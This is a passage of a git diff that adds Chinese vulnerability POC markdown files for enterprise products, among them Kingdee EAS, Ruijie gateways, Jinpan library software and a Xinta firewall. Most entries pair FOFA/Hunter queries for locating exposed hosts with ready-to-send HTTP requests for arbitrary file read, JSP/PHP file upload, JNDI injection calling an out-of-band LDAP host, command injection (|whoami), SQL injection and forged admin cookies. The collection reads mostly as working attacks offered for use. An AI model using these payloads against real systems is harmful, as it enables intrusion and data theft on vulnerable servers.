+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Connection: close
+Upgrade-Insecure-Requests: 1
+```
+
+![1693023522105-e7fe1ee4-d044-4342-890c-14c8186beae2.png](./img/xKPjSvbVlNKLE_7U/1693023522105-e7fe1ee4-d044-4342-890c-14c8186beae2-177823.png)
+
+通过获取的账号密码登录后台
+
+![1693023660033-f14ad2f4-0a68-443f-a419-20be7830cc76.png](./img/xKPjSvbVlNKLE_7U/1693023660033-f14ad2f4-0a68-443f-a419-20be7830cc76-527705.png)
+
+
+
+> 更新: 2024-02-29 23:55:51  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fosg83r3n5fm40nv>
\ No newline at end of file
diff --git a/金盘移动图书馆系统download.jsp存在任意文件读取漏洞.md b/金盘移动图书馆系统download.jsp存在任意文件读取漏洞.md
new file mode 100644
index 0000000..d22522a
--- /dev/null
+++ b/金盘移动图书馆系统download.jsp存在任意文件读取漏洞.md
@@ -0,0 +1,25 @@
+# 金盘移动图书馆系统download.jsp存在任意文件读取漏洞
+
+金盘移动图书馆系统download.jsp存在任意文件读取漏洞，通过该漏洞读取数据库配置文件等
+
+## fofa
+
+```javascript
+app="金盘软件-金盘移动图书馆系统"
+```
+
+## poc
+
+```javascript
+GET /pages/admin/tools/file/download.jsp?items=/WEB-INF/classes/db/default.properties HTTP/1.1
+Host: 127.0.0.1
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cookie: JSESSIONID=D8C7BD39FAF4DD095FBBB0E87FB017C5
+Connection: close
+```
+
+![image-20250217101024678](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502171010739.png)
\ No newline at end of file
diff --git a/金盘移动图书馆系统upload存在任意文件上传漏洞.md b/金盘移动图书馆系统upload存在任意文件上传漏洞.md
new file mode 100644
index 0000000..138ef14
--- /dev/null
+++ b/金盘移动图书馆系统upload存在任意文件上传漏洞.md
@@ -0,0 +1,34 @@
+# 金盘移动图书馆系统upload存在任意文件上传漏洞
+
+金盘图书馆微信管理平台 /common/upload/upload 接口存在任意文件上传漏洞，攻击者通过漏洞可以获取权限。
+
+## fofa
+
+```javascript
+app="金盘软件-金盘移动图书馆系统"
+```
+
+## poc
+
+```javascript
+POST /common/upload/upload HTTP/1.1
+Host: 127.0.0.1
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Content-Type: multipart/form-data; boundary=399e563f0389566bd40fd4d6409a67dd
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
+Cookie: JSESSIONID=D8C7BD39FAF4DD095FBBB0E87FB017C5
+Connection: close
+Content-Length: 179
+
+--399e563f0389566bd40fd4d6409a67dd
+Content-Disposition: form-data; name="file"; filename="aaaaaa.jspx"
+
+<% out.println("Do You Want?"); %>
+--399e563f0389566bd40fd4d6409a67dd--
+```
+
+![image-20250217100804857](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202502171008957.png)
\ No newline at end of file
diff --git a/金航网上阅卷系统fileUpload任意文件上传漏洞.md b/金航网上阅卷系统fileUpload任意文件上传漏洞.md
new file mode 100644
index 0000000..d7ddfca
--- /dev/null
+++ b/金航网上阅卷系统fileUpload任意文件上传漏洞.md
@@ -0,0 +1,40 @@
+# 金航网上阅卷系统fileUpload任意文件上传漏洞
+
+衡水金航计算机科技有限公司是一家长期致力于图像标记识别采集技术及信息管理系统的软件企业。金航网上阅卷系统：可以广泛地应用于高考、中考、教育局组织的学校联考、各类学校自组织考试、各种行业考试、职称考试等。衡水金航计算机科技有限公司金航网上阅卷系统 fileUpload 任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。
+
+## hunter
+
+```javascript
+web.body="js/insteadSelect/jquery.insteadSelect.css"
+```
+
+## poc
+
+```javascript
+POST /fileUpload HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
+Content-Type: multipart/form-data; boundary=00content0boundary00
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Content-Length: 351
+Connection: close
+
+--00content0boundary00
+Content-Disposition: form-data; name="upload"; filename="poc.jsp"
+Content-Type: application/pdf
+
+<%out.println("1234");%>
+--00content0boundary00
+Content-Disposition: form-data; name="uploadContentType"
+
+pdf
+--00content0boundary00
+Content-Disposition: form-data; name="uploadFileName"
+
+1.jsp
+--00content0boundary00--
+```
+
+![image-20241107235030738](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411072350903.png)
+
+文件路径：`/upload/poc.jsp`
\ No newline at end of file
diff --git a/金蝶Apusic应用服务器loadTree-JNDI注入漏洞.md b/金蝶Apusic应用服务器loadTree-JNDI注入漏洞.md
new file mode 100644
index 0000000..856bc39
--- /dev/null
+++ b/金蝶Apusic应用服务器loadTree-JNDI注入漏洞.md
@@ -0,0 +1,45 @@
+## 金蝶Apusic应用服务器loadTree JNDI注入漏洞
+
+## fofa
+```
+app="Apusic应用服务器"
+```
+
+## poc
+```
+POST /appmonitor/protect/jndi/loadTree HTTP/1.1
+host:127.0.0.1
+
+jndiName==ldap://地址
+
+
+
+POST /admin/;//protect/jndi/loadTree HTTP/1.1
+host:127.0.0.1
+
+jndiName==ldap://地址
+
+
+
+POST /admin/;//protect/datasource/createDataSource HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
+Content-Length: 260
+Accept-Encoding: gzip, deflate, br
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+
+name=nobg7&jndiName=ldap://cm38sdn1l3f79d1jb0jgoahe856jrdjkg.oast.site/ahsdhashduqwe&dbtype=mysql&drivertype=&host=127.0.0.1&port=3306&dbname=nobg7&userName=nobg7&password=nobg7&repassword=nobg7&connectionURL=sdasd&driverClassName=java.lang.String&testCommand=
+```
+
+![a519acd405e2e60c00108378f8410c8d](https://github.com/wy876/POC/assets/139549762/faa32ae9-f7b0-4a76-9990-74635d28bd2f)
+
+![1dc3f827f335c01618f9dd9c4b39832b](https://github.com/wy876/POC/assets/139549762/6eff9f3b-df75-4008-b713-db61a32739bd)
+
+![584c726b09f954433d5c3248ac5c1368](https://github.com/wy876/POC/assets/139549762/dfe99f4f-d6eb-4869-a2f8-59d792d9dac4)
+
+![02678af9ca19b8ee1104c874943e5f94](https://github.com/wy876/POC/assets/139549762/09aba93a-9c71-4924-9314-28f054ce2fd7)
+
+
+##漏洞来源
+- https://mp.weixin.qq.com/s/iEHmFOKq5LT2x9Hp1ysLIw
diff --git a/金蝶EAS-myUploadFile任意文件上传.md b/金蝶EAS-myUploadFile任意文件上传.md
new file mode 100644
index 0000000..2bfde2a
--- /dev/null
+++ b/金蝶EAS-myUploadFile任意文件上传.md
@@ -0,0 +1,34 @@
+
+## 金蝶EAS myUploadFile任意文件上传
+![](https://mmbiz.qpic.cn/sz_mmbiz_png/Lc4ILVKo1g9cSbQc2icEW80fDeYIQ78YeAVSBibGsibyzialJJWOTNHIVt7dpyC4CDibfPeaI3Apn7jn4zHwhPpsWfg/640?wx_fmt=png&wxfrom=5&wx_lazy=1&wx_co=1)
+
+## fofa
+```
+app="Kingdee-EAS"
+```
+
+## POC
+```
+POST /easportal/buffalo/%2e%2e/cm/myUploadFile.do HTTP/1.1
+Host: 127.0.0.1
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySq4lDnabv8CwHfvx
+Content-Length: 205
+
+------WebKitFormBoundarySq4lDnabv8CwHfvx
+Content-Disposition: form-data; name="myFile"; filename="test.jsp"
+Content-Type: text/html
+
+<%out.println("test");%>
+------WebKitFormBoundarySq4lDnabv8CwHfvx--
+```
+
+jsp路径：
+
+http://127.0.0.1/easportal/buffalo/../test.jsp
diff --git a/金蝶EAS存在appUtil.jsp命令执行漏洞.md b/金蝶EAS存在appUtil.jsp命令执行漏洞.md
new file mode 100644
index 0000000..51357ad
--- /dev/null
+++ b/金蝶EAS存在appUtil.jsp命令执行漏洞.md
@@ -0,0 +1,27 @@
+# 金蝶EAS存在appUtil.jsp命令执行漏洞
+
+金蝶EAS和金蝶EAS Cloud在多个版本中存在文件上传漏洞，未经授权的攻击者可以通过特制的请求包或上传恶意的webshell文件，从而进行远程代码执行，控制服务器。
+
+## fofa
+
+```javascript
+app="Kingdee-EAS"
+```
+
+## poc
+
+```javascript
+GET /easportal/tools/appUtil.jsp?list=%7B%22x%22%3A%7B%22%40type%22%3A%22java.net.Inet4Address%22%2C%22val%22%3A%22csbs1ru8ki46d67eiob0ywz51btedcjtj.oast.me%22%7D%7D HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+Connection: close
+Accept-Encoding: gzip, deflate
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411071131958.webp)
+
+
+
+## 漏洞来源
+
+- https://mp.weixin.qq.com/s/g7XvKIKPQf35z4IPt5i8iA
diff --git a/金蝶OA-EAS系统-uploadLogo.action-任意文件上传漏洞.md b/金蝶OA-EAS系统-uploadLogo.action-任意文件上传漏洞.md
new file mode 100644
index 0000000..2bd2575
--- /dev/null
+++ b/金蝶OA-EAS系统-uploadLogo.action-任意文件上传漏洞.md
@@ -0,0 +1,59 @@
+
+## 金蝶OA-EAS系统 uploadLogo.action 任意文件上传漏洞
+
+金蝶 EAS 及 EAS Cloud 是金蝶软件公司推出的一套企业级应用软件套件，旨在帮助企业实现全面的管理和业务流程优化。金蝶 EAS 及 EAS Cloud 在 uploadLogo.action 存在文件上传漏洞，攻击者可以利用文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。
+
+## fofa
+```
+app="Kingdee-EAS"
+```
+
+## poc
+```
+POST /plt_portal/setting/uploadLogo.action HTTP/1.1
+Host: 
+User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+X-Forwarded-For: 
+Content-Length: 632
+Content-Type: multipart/form-data; boundary=04844569c7ca7d21a3ca115dca477d62
+
+--04844569c7ca7d21a3ca115dca477d62
+Content-Disposition: form-data; name="chooseLanguage_top"; filename="chooseLanguage_top"
+
+ch
+--04844569c7ca7d21a3ca115dca477d62
+Content-Disposition: form-data; name="dataCenter"; filename="dataCenter"
+
+xx
+--04844569c7ca7d21a3ca115dca477d62
+Content-Disposition: form-data; name="insId"; filename="insId"
+
+
+--04844569c7ca7d21a3ca115dca477d62
+Content-Disposition: form-data; name="type"; filename="type"
+
+top
+--04844569c7ca7d21a3ca115dca477d62
+Content-Disposition: form-data; name="upload"; filename="test.jsp"
+Content-Type: image/png
+
+test
+--04844569c7ca7d21a3ca115dca477d62--
+```
+![3c4d1cec26f6b03e1876b02c2f7029d9](https://github.com/wy876/POC/assets/139549762/d7a2b831-852c-4488-bcd0-f9967d0e32a4)
+
+## 上传文件路径
+```
+
+GET /portal/res/file/upload/xxx.jsp HTTP/1.1
+Host: 
+User-Agent: Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.1; FDM; SV1; .NET CLR 3.0.04506.30)
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+X-Forwarded-For:
+```
+![47f8b3b0cc61c63d9a0d2d2b54a602dc](https://github.com/wy876/POC/assets/139549762/8a80fc29-9d8e-4622-a465-3c3c423f1e57)
diff --git a/金蝶OA云星空-ScpSupRegHandler-任意文件上传漏洞.md b/金蝶OA云星空-ScpSupRegHandler-任意文件上传漏洞.md
new file mode 100644
index 0000000..6d2efce
--- /dev/null
+++ b/金蝶OA云星空-ScpSupRegHandler-任意文件上传漏洞.md
@@ -0,0 +1,51 @@
+## 金蝶OA云星空 ScpSupRegHandler 任意文件上传漏洞
+
+### 漏洞描述：
+金蝶OA云星空 ScpSupRegHandler接口存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件获取服务器权限
+
+### 漏洞影响：
+
+金蝶云星空企业版私有云、企业版私有云（订阅）、标准版私有云（订阅）三个产品V6.2(含17年12月补丁) 至 V8.1(含23年9月补丁)
+
+### 网络测绘：
+```
+app="金蝶云星空-管理中心"
+```
+
+### 漏洞复现：
+登陆页面
+POC:
+```
+POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1
+Host: 
+Accept-Encoding: identity
+Content-Length: 973
+Accept-Language: zh-CN,zh;q=0.8
+Accept: */*Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=2ac719f8e29343df94aa4ab49e456061
+
+--2ac719f8e29343df94aa4ab49e456061
+Content-Disposition: form-data; name="dbId_v"
+
+.
+--2ac719f8e29343df94aa4ab49e456061
+
+Content-Disposition: form-data; name="FID"
+
+2022
+--2ac719f8e29343df94aa4ab49e456061
+Content-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/test.ashx."
+Content-Type: text/plain
+
+11
+--2ac719f8e29343df94aa4ab49e456061-
+```
+
+![image](https://github.com/wy876/POC/assets/139549762/0175cf8c-a854-4b15-800c-7a07e3d0306c)
+
+![image](https://github.com/wy876/POC/assets/139549762/7e731399-8257-448b-9ab4-2260d9c4dc43)
+
+### 文件上传路径
+```
+访问路径：/K3Cloud/uploadfiles/Test.ashx
+```
diff --git a/金蝶云星空-CommonFileserver-任意文件读取漏洞.md b/金蝶云星空-CommonFileserver-任意文件读取漏洞.md
new file mode 100644
index 0000000..462f205
--- /dev/null
+++ b/金蝶云星空-CommonFileserver-任意文件读取漏洞.md
@@ -0,0 +1,4 @@
+## 金蝶云星空 CommonFileserver 任意文件读取漏洞
+```
+GET /CommonFileServer/c:/windows/win.ini
+```
diff --git a/鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞.md b/鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞.md
new file mode 100644
index 0000000..8f92e2f
--- /dev/null
+++ b/鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞.md
@@ -0,0 +1,41 @@
+# 鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞
+
+# 一、漏洞简介
+鑫塔第二代防火墙sslvpn_client存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。
+
+# 二、影响版本
++ 博达下一代防火墙
+
+# 三、资产测绘
++ hunter`web.body="欢迎登录鑫塔第二代防火墙"`
++ 特征
+
+![1701763927338-de770e3a-3043-4409-ab92-51fd20c0c231.png](./img/a95HTPaLIvNmPZAV/1701763927338-de770e3a-3043-4409-ab92-51fd20c0c231-964403.png)
+
+# 四、漏洞复现
+```java
+GET /sslvpn/sslvpn_client.php?client=logoImg&img=x%20/tmp|echo%20%60whoami%60%20|tee%20/usr/local/webui/sslvpn/ceshi.txt|ls HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e.png](./img/a95HTPaLIvNmPZAV/1701762310844-e2bb6845-f268-450b-b1ef-4ddc2f30876e-966135.png)
+
+获取命令执行结果
+
+```java
+GET /sslvpn/ceshi.txt HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
+Host: xx.xx.xx.xx
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1701762342384-224cbced-19ed-428d-b26d-9957865251d2.png](./img/a95HTPaLIvNmPZAV/1701762342384-224cbced-19ed-428d-b26d-9957865251d2-569179.png)
+
+
+
+> 更新: 2024-02-29 23:57:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/du84v1279q9b4hgp>
\ No newline at end of file
diff --git a/铭飞CMS-list接口存在SQL注入.md b/铭飞CMS-list接口存在SQL注入.md
new file mode 100644
index 0000000..6fd8814
--- /dev/null
+++ b/铭飞CMS-list接口存在SQL注入.md
@@ -0,0 +1,12 @@
+## 铭飞CMS list接口存在SQL注入
+
+## fofa
+```
+body="铭飞MCMS" || body="/mdiy/formData/save.do" || body="static/plugins/ms/1.0.0/ms.js"
+```
+
+## poc
+```
+http://127.0.0.1/cms/content/list?categoryId=1%27%20and%20updatexml(1,concat(0x7e,md5(123),0x7e),1)%20and%20%271
+```
+![image](https://github.com/wy876/POC/assets/139549762/9f9df303-e0b5-4707-a3a8-228e97ab74a0)
diff --git a/锁群管理系统存在逻辑缺陷漏洞.md b/锁群管理系统存在逻辑缺陷漏洞.md
new file mode 100644
index 0000000..7a2d7d4
--- /dev/null
+++ b/锁群管理系统存在逻辑缺陷漏洞.md
@@ -0,0 +1,20 @@
+# 锁群管理系统存在逻辑缺陷漏洞
+锁群管理系统存在逻辑缺陷漏洞，攻击者可利用该漏洞获取敏感信息。 
+
+## fofa
+
+```javascript
+title=="锁群管理系统 V2.0"
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733070567966-134a04c6-0e40-46c3-8d09-f9367f8ddc62.png)
+
+## poc
+cookie中添加如下内容，即可进入后台
+
+```javascript
+Cookie: ASP.NET_SessionId=evadd1jksrepp4gtbgockcbi; username=admin; power=1; powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; code=admin
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1733070671832-06b3fd9e-545c-48f6-88e7-c8543c1a36b5.png)
+
diff --git a/锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md b/锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md
new file mode 100644
index 0000000..4cfb6f2
--- /dev/null
+++ b/锐捷-NBR-路由器-fileupload.php-任意文件上传漏洞.md
@@ -0,0 +1,11 @@
+## 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
+
+```
+POST /ddi/server/fileupload.php?uploadDir=../../321&name=123.php HTTP/1.1
+Host: 
+Accept: text/plain, */*; q=0.01
+Content-Disposition: form-data; name="file"; filename="111.php"
+Content-Type: image/jpeg
+
+<?php phpinfo();?>
+```
diff --git a/锐捷AC无线控制器存在命令执行漏洞.md b/锐捷AC无线控制器存在命令执行漏洞.md
new file mode 100644
index 0000000..6e24615
--- /dev/null
+++ b/锐捷AC无线控制器存在命令执行漏洞.md
@@ -0,0 +1,39 @@
+# 锐捷AC无线控制器存在命令执行漏洞
+
+**一、漏洞简介**  
+<font style="color:rgb(34, 34, 34);">锐捷AC无线控制器存在命令执行漏洞，攻击者可通过该漏洞执行任意命令</font>  
+**二、影响版本**
+
+锐捷AC无线控制器
+
+**三、资产测绘**
+
+```plain
+web.body="简网络，玩智分，无线移动体验 "
+```
+
+●登录![1711997786378-edcef547-10cd-420c-832e-a770238eb3f2.png](./img/SkGRDmmGc2Tiryjr/1711997786378-edcef547-10cd-420c-832e-a770238eb3f2-083457.png)
+
+![1711997819097-a4244fdc-1bef-41ee-b4ff-ed704db1c612.png](./img/SkGRDmmGc2Tiryjr/1711997819097-a4244fdc-1bef-41ee-b4ff-ed704db1c612-391171.png)
+
+
+
+![1711997764050-f8b07f3f-7a50-4784-b518-dde60cd3f693.png](./img/SkGRDmmGc2Tiryjr/1711997764050-f8b07f3f-7a50-4784-b518-dde60cd3f693-905629.png)
+
+**四、漏洞复现**
+
+```plain
+POST /web_action.do HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+action=shell&command=ls
+```
+
+![1711997844450-ea706a57-d350-4ae3-9d94-65913aa37d36.png](./img/SkGRDmmGc2Tiryjr/1711997844450-ea706a57-d350-4ae3-9d94-65913aa37d36-776431.png)
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fivwdfbv0bacamon>
\ No newline at end of file
diff --git a/锐捷EG易网关branch_import存在后台远程命令执行漏洞.md b/锐捷EG易网关branch_import存在后台远程命令执行漏洞.md
new file mode 100644
index 0000000..efbd055
--- /dev/null
+++ b/锐捷EG易网关branch_import存在后台远程命令执行漏洞.md
@@ -0,0 +1,49 @@
+# 锐捷 EG易网关branch_import存在后台远程命令执行漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">锐捷 EG易网关cli存在后台远程命令执行漏洞。  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+```java
+锐捷EG易网关
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**
+
+```java
+app="Ruijie-EG易网关"
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">●登录页面</font>
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/q5gbx381pZqiSO5A/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-866006.png)
+
+# <font style="color:rgb(38, 38, 38);">四、漏洞复现</font>
+1. 通过弱口令或账号密码泄露漏洞登录后台获取cookie
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/q5gbx381pZqiSO5A/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-331307.png)
+
+2. 通过上一步获取的cookie执行命令
+
+```java
+POST /itbox_pi/branch_import.php?a=branch_list HTTP/1.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=ihvlofd9j5bfjbikfrtng7p9f5; helpKey=home_sys;user=admin
+X-Requested-With: XMLHttpRequest
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+Content-Length: 16
+
+province=|whoami
+```
+
+![1714060183007-068368ef-b67b-4783-8549-487afc30bdcd.png](./img/q5gbx381pZqiSO5A/1714060183007-068368ef-b67b-4783-8549-487afc30bdcd-351882.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mdlrafum0t2146rf>
\ No newline at end of file
diff --git a/锐捷EG易网关branch_passw.php远程代码执行漏洞.md b/锐捷EG易网关branch_passw.php远程代码执行漏洞.md
new file mode 100644
index 0000000..2c591a9
--- /dev/null
+++ b/锐捷EG易网关branch_passw.php远程代码执行漏洞.md
@@ -0,0 +1,62 @@
+# 锐捷EG易网关branch_passw.php远程代码执行漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**
+
+<font style="color:rgb(38, 38, 38);">锐捷 EG易网关cli存在后台远程命令执行漏洞。</font>
+
+<font style="color:rgb(38, 38, 38);"> </font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+`锐捷EG易网关`  
+**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**
+
+`app="Ruijie-EG易网关"`  
+<font style="color:rgb(38, 38, 38);">●登录页面</font>  
+
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/5-olKjEqA8Fof2za/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-027421.webp)
+
+  
+**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**  
+1、通过弱口令或账号密码泄露漏洞登录后台获取cookie  
+
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/5-olKjEqA8Fof2za/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-244322.webp)
+
+  
+2、branch_passw.php执行whoami命令，写入web根目录test.txt文件，再访问test.txt文件得到回显。
+
+```plain
+POST /itbox_pi/branch_passw.php?a=set HTTP/1.1
+Host: {{Hostname}}
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+DNT: 1
+Connection: close
+Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=e2iuc40kc25v8bosaf04ee7273; user=admin; helpKey=home_sys
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 24
+
+pass=|whoami>../test.txt
+```
+
+
+
+3、写入文件地址
+
+```plain
+/test.txt
+```
+
+  
+![1711947576518-8aa155d7-86d7-4a78-9ecf-201b653a1f2c.png](./img/5-olKjEqA8Fof2za/1711947576518-8aa155d7-86d7-4a78-9ecf-201b653a1f2c-873932.png)
+
+  
+ 
+
+
+
+> 更新: 2024-06-24 11:42:25  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gcrohorfhsnzh1ix>
\ No newline at end of file
diff --git a/锐捷EG易网关cli存在后台远程命令执行漏洞.md b/锐捷EG易网关cli存在后台远程命令执行漏洞.md
new file mode 100644
index 0000000..dcccdfd
--- /dev/null
+++ b/锐捷EG易网关cli存在后台远程命令执行漏洞.md
@@ -0,0 +1,48 @@
+# 锐捷 EG易网关cli存在后台远程命令执行漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">锐捷 EG易网关cli存在后台远程命令执行漏洞。  
+</font>**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
+```java
+锐捷EG易网关
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**
+
+```java
+app="Ruijie-EG易网关"
+```
+
+<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">●登录页面</font>
+
+![1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553.png](./img/1VOXlH5i8imJ_XHe/1710773302248-caa9069a-265b-44c3-8a1c-ee627b562553-636269.png)
+
+# <font style="color:rgb(38, 38, 38);">四、漏洞复现</font>
+1. 通过弱口令或账号密码泄露漏洞登录后台获取cookie
+
+![1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c.png](./img/1VOXlH5i8imJ_XHe/1711298713325-517a2298-d16c-4786-a1f9-3e40836a4f8c-408094.png)
+
+2. 通过上一步获取的cookie执行命令
+
+```java
+POST /cli.php?a=shell HTTP/1.1
+Host: 
+User-Agent: Go-http-client/1.1
+Content-Length: 24
+Content-Type: application/x-www-form-urlencoded
+Cookie: LOCAL_LANG_COOKIE=zh; RUIJIEID=j4rjrjdtilmhj824o98sv11r45; helpKey=home_sys;user=admin; 
+X-Requested-With: XMLHttpRequest
+Accept-Encoding: gzip
+
+notdelay=true&command=id
+```
+
+![1711298769718-5281899e-c512-4cdb-b948-3ab79506923b.png](./img/1VOXlH5i8imJ_XHe/1711298769718-5281899e-c512-4cdb-b948-3ab79506923b-483591.png)
+
+
+
+> 更新: 2024-06-24 11:42:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rggbsmpwgacek7ih>
\ No newline at end of file
diff --git a/锐捷EG易网关download.php后台任意文件读取漏洞.md b/锐捷EG易网关download.php后台任意文件读取漏洞.md
new file mode 100644
index 0000000..410348a
--- /dev/null
+++ b/锐捷EG易网关download.php后台任意文件读取漏洞.md
@@ -0,0 +1,37 @@
+# 锐捷EG易网关download.php后台任意文件读取漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**
+
+<font style="color:rgb(38, 38, 38);">锐捷EG易网关download.php后台任意文件读取漏洞 </font>
+
+**<font style="color:rgb(38, 38, 38);">二、影响版本</font>**
+
